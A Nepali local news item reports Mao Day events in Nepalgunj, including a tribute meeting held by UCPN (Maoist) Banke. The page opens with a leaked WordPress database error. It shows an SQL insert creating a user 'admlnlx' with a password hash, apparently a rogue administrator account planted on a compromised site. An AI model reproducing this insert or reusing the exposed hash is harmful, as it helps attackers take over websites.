WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bz5QUCi60SV4bsgGuR62TTjfd6q/of/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 18:01:51', '', 'admlnlx', 'admlnlx')
नेपालगन्ज,पुस ११-
१ सय २३ औं माओ दिवस आज माओको सम्झनामा विभिन्न कार्यक्रम गरि मनाईदै छ ।
चिनियाँ नयाँ जनवादी क्रान्तिका सफल प्रयोक्ता एवम् प्रणेता माओ–त्सेतुङको जन्म २६ डिसेम्बर सन् १८९३ मा हुनान प्रान्तको साओसानमा भएको थियो । एउटै सिद्धान्त एवम् विचार मान्ने भएपनि विभाजित अवस्थामा रहेका नेपालका कम्युनिष्ट पार्टीहरुले पनि विविध कार्यक्रम गरि माओ दिवसका मनाउँदैछन् ।
दिवसका अवसरमा एमाओवादी बाँकेले आज पार्टी कार्यालयमा श्रद्धाञ्जलीसभाको आयोजना गरेको पार्टीका जिल्ला संयोजक आइपी खरेलले जानकारी दिनुभयो ।